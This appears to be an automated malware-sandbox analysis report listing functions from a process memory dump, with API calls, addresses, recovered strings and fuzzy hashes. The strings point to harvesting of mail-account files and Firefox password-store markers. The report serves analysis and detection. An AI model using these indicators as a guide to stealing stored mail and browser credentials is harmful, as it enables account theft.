                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                    • String ID: %s (%s)
                                                                                                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                                                                                                    • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                    Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                    • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                    • API String ID: 1640410171-3316789007
                                                                                                                                                                                    • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                    • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                    Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 125969286-791839006
                                                                                                                                                                                    • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                    Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                    • String ID: ACD
                                                                                                                                                                                    • API String ID: 1886237854-620537770
                                                                                                                                                                                    • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                    Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                    • String ID: caption$dialog_%d
                                                                                                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                                                                                                    • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                    • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                    Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • unknown error, xrefs: 004277B2
                                                                                                                                                                                    • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                    • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                    • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                    • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                    • API String ID: 3510742995-3035234601
                                                                                                                                                                                    • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                    • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                    • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                    Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                    • API String ID: 2221118986-3608744896
                                                                                                                                                                                    • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                    • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                    Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                                                                                    • memset.MSVCRT ref: 00410246
                                                                                                                                                                                    • memset.MSVCRT ref: 00410258
                                                                                                                                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                    • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3974772901-0
                                                                                                                                                                                    • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                    Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                    • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                                                    • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                    Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                    • String ID: imap$pop3$smtp
                                                                                                                                                                                    • API String ID: 2025310588-821077329
                                                                                                                                                                                    • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                    Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,761F0A60), ref: 00408EBE
                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,761F0A60), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                    • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                    Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2014771361-0
                                                                                                                                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                    Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID: global-salt$password-check
                                                                                                                                                                                    • API String ID: 231171946-3927197501
                                                                                                                                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                    Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                    Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
